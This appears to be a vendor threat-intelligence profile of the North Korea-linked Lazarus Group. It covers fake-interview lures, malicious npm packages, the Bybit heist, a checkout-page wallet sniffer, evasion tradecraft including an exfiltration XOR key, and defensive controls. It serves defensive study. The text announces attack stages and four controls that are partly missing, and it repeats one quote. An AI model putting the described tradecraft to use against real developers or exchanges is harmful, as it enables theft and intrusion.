Lazarus Group is a state-sponsored advanced persistent threat organization attributed to the Democratic People’s Republic of Korea (DPRK), active since at least 2007. The group conducts dual-mandate operations combining espionage-driven intelligence collection with large-scale financially motivated cybercrime, including cryptocurrency exchange heists, e-commerce payment interception, and supply chain compromise. What differentiates Lazarus from other nation-state APTs is its simultaneous pursuit of strategic intelligence and direct revenue generation at global scale, targeting crypto exchanges, energy utilities, government institutions, science and engineering firms, and software and IT companies across five industries on every continent. Group-IB’s Threat Intelligence platform continuously tracks the group’s campaigns, tooling, and infrastructure through its Masked Actors threat actor profiles.
Global; historical emphasis on US and South Korea for espionage; no geographic constraint for financial operations
Masked Actors threat actor profile via Threat Intelligence
The Contagious Interview campaign has been Lazarus’s most operationally significant effort since 2024. Group-IB’s analysis of APT Lazarus: Eager Crypto Beavers, Video Calls and Games confirms the campaign was “going full steam ahead” through 2024, with operators targeting cryptocurrency and technology professionals through fake job interviews.
The attack chain proceeds through four documented stages:
The campaign’s focus on developers is strategic: a compromised engineer at a crypto exchange provides direct access to the assets the group seeks to steal, while a compromised open-source contributor can seed malicious code across the entire downstream dependency chain. The gaming-related lures target blockchain game and NFT developers, extending the attack surface into an adjacent sector with direct crypto exposure.
Lazarus has not slowed down. Through 2024 and into 2025, we tracked the Contagious Interview campaign evolving its tooling with Python-based scripts, fake video call setups, and social engineering lures targeting crypto professionals. What makes this group dangerous is the speed at which they iterate on delivery mechanisms, so defenders need threat intelligence that maps these shifts in near real time rather than relying on static IOC lists that go stale within days.
In February 2025, Lazarus Group breached cryptocurrency exchange Bybit in one of the largest crypto heists ever attributed to a single threat actor. Public reporting placed losses in the billions of dollars. The attack demonstrates the group’s capability to target high-value centralized exchange infrastructure and convert stolen assets at scale, consistent with the regime’s use of cryptocurrency theft as a primary sanctions-evasion mechanism.
Group-IB’s Six Supply Chain Attack Groups to Watch Out for in 2026 documents the Bybit breach as originating from compromised Safe{Wallet} infrastructure rather than a direct strike on the exchange itself. This reflects a consistent pattern: Lazarus identifies exchanges with gaps in cold wallet security or upstream software dependencies, establishes persistent access through social engineering or supply chain entry points, and executes the final asset transfer when conditions are optimized for maximum extraction with minimum detection time.
Group-IB’s Six Supply Chain Attack Groups to Watch Out for in 2026 documents Lazarus operating at scale across open-source ecosystems, publishing malicious npm packages that mimic widely used libraries including is-buffer, eslint, redux, and react-related tools. Developers install these packages as part of the Contagious Interview campaign — unknowingly deploying BeaverTail, a JavaScript-based credential and cryptocurrency wallet stealer, alongside InvisibleFerret, a Python backdoor enabling persistent access and data exfiltration. In multiple waves across 2025, Group-IB identified dozens of malicious packages, some using crypto-clipping techniques that silently redirect digital asset transfers to attacker-controlled wallets.
To reach developers at scale, Lazarus builds convincing fake personas on LinkedIn and GitHub, complete with employment histories, code repositories, and contribution activity. These personas funnel targets into weaponized repositories or into the fake interview pipeline. According to Group-IB’s HTCT 2026 report, supply chain attacks have become the dominant force reshaping the global cyber threat landscape — and Lazarus’s npm operations represent exactly the industrialized form of this model: one poisoned package reaching thousands of developers who install it as a trusted dependency.
In parallel with high-value exchange heists, Lazarus operates the BTC Changer JavaScript sniffer, which intercepts cryptocurrency payments at e-commerce checkout by silently modifying wallet addresses to redirect funds to attacker-controlled accounts. This lower-profile, steady-revenue operation runs alongside the group’s larger campaigns.
Lazarus combines high-investment social engineering with technically sophisticated evasion to conduct long-duration intrusions against well-defended targets. The Contagious Interview methodology exploits deeply embedded professional trust norms, while the group’s evasion investment reflects the operational requirements of maintaining access across extended campaigns.
Sharmine Low, Malware Analyst at Group-IB APAC and contributor to Group-IB’s Lazarus threat intelligence research, notes that the group’s cross-platform tooling evolution, from Windows-focused implants to Python-based scripts and macOS extended attribute abuse, provides a persistent behavioral fingerprint that aids attribution even as individual indicators rotate rapidly.
living-off-the-land via legitimate system utilities to avoid spawning suspicious new processes; multi-stage payload delivery where each stage is fetched only after the previous one validates the environment; FTP-based exfiltration with XOR encryption (key G01d*8@(“); compartmentalized C2 communications using actor-registered domains mimicking legitimate services.
The practical implication for defenders is that no single detection layer is sufficient against this adversary. Lazarus’s kill chain is specifically designed to appear benign at each individual stage, with the full attack only becoming visible when multiple telemetry sources are correlated. This makes comprehensive endpoint visibility combined with Threat Intelligence-driven behavioral baselines a prerequisite for reliable detection, rather than a nice-to-have capability.
Lazarus Group is attributed to the Democratic People’s Republic of Korea (DPRK). Group-IB’s Masked Actors threat actor profile records Heritage: DPRK, with first observed activity in 2007 and global operational scope.
The 2016 Bangladesh Bank heist provided early technical corroboration: IP addresses used in the SWIFT fraud were traced back to North Korean infrastructure, a finding subsequently confirmed by the FBI. Group-IB’s own investigation of Lazarus infrastructure independently identified North Korean IP addresses in the C2 chain, traced to Pyongyang’s Potonggang District where the National Defence Commission is located. The UN Security Council Panel of Experts has directly linked DPRK cyber operations to the regime’s weapons procurement budget, providing geopolitical corroboration independent of technical analysis.
Sharmine Low, Malware Analyst at Group-IB APAC, notes that the group’s cross-platform tooling evolution provides a persistent behavioral fingerprint that survives rapid indicator rotation.
Reactive detection is insufficient against an actor with Lazarus’s resources and iteration speed. The Contagious Interview campaign demonstrates that Lazarus retools delivery mechanisms faster than static IOC lists can be updated, making Threat Intelligence-driven behavioral detection the only reliable approach. The following four controls address Lazarus’s most consistently observed initial access, persistence, and collection techniques across documented campaigns.
Group-IB’s Threat Intelligence platform provides the operational foundation for anticipatory defense against Lazarus. Four highest-priority controls:
Flag Python processes launched from video call clients, browser downloads, or professional networking applications. The Contagious Interview campaign consistently delivers infection via Python scripts presented as coding tests. This single detection rule covers the most active Lazarus initial access vector.
Lazarus publishes packages mimicking is-buffer, eslint, redux, and react-related libraries. Runtime dependency scanning, lockfile pinning, and integrity verification for open-source packages are required to detect BeaverTail and InvisibleFerret before installation.
BTC Changer operates client-side; standard server-side WAFs do not catch it. Monitor checkout page JavaScript for runtime modifications to wallet address fields and outbound POST requests to non-origin domains.
Group-IB's Managed XDR natively embeds malware detonation, providing behavioral analysis of Lazarus-associated samples including Python Contagious Interview payloads and BTC Changer variants without manual triage bottlenecks.
Unlike most nation-state groups that operate with a single mandate, Lazarus simultaneously pursues strategic intelligence collection and large-scale financially motivated cybercrime, including cryptocurrency exchange attacks, e-commerce JS-sniffer deployment, and supply chain compromise at the npm package ecosystem level. This dual mandate across five industries on a global scope is unmatched by most nation-state APTs, which typically concentrate on a single sector or region. Group-IB’s Threat Intelligence platform differentiates Lazarus from overlapping DPRK-linked clusters through its Masked Actors threat actor profiles, using infrastructure patterns, malware code similarities, and behavioral indicators to maintain attribution confidence even as tooling overlap between state and criminal actors increases.
According to Group-IB’s HTCT 2026 report, supply chain attacks have become “the dominant force reshaping the global cyber threat landscape,” and Lazarus is positioned to intensify this vector through active developer targeting via Contagious Interview and npm ecosystem poisoning. Group-IB analysts expect the group to integrate AI-generated content to scale the operator-intensive fake interview methodology, removing the resource constraint that currently limits per-target engagement. Cross-platform tooling expansion to macOS and Linux will continue as organizations diversify endpoint environments. The cryptocurrency sector will remain the primary financial target given its direct sanctions-evasion utility for the DPRK regime.
Key Takeaway, Group-IB Finding (2025 to 2026):
Lazarus Group is one of the most operationally versatile state-sponsored threat actors tracked by Group-IB, uniquely combining espionage with large-scale financially motivated cybercrime across five industries (crypto, energy, government, science, and software) on a global scale. According to Group-IB’s HTCT 2026 report, supply chain attacks have become the dominant force reshaping the cyber threat landscape, and Lazarus’s active targeting of software developers through Contagious Interview and malicious npm packages — mimicking is-buffer, eslint, redux, and react-related libraries and deploying BeaverTail and InvisibleFerret — positions it as the primary state-linked npm ecosystem threat in 2026. The group’s February 2025 breach of cryptocurrency exchange Bybit, originating from compromised Safe{Wallet} infrastructure, demonstrates that Lazarus exploits supply chain trust to reach targets that would otherwise be hardened against direct attack. Group-IB’s Masked Actors threat actor profiles and Threat Intelligence platform provide continuously updated tracking of the group’s campaigns, tooling, and infrastructure to enable anticipatory defense.
<!– RULE COMPLIANCE LOG
Applied rules (2026-03-25):
–>
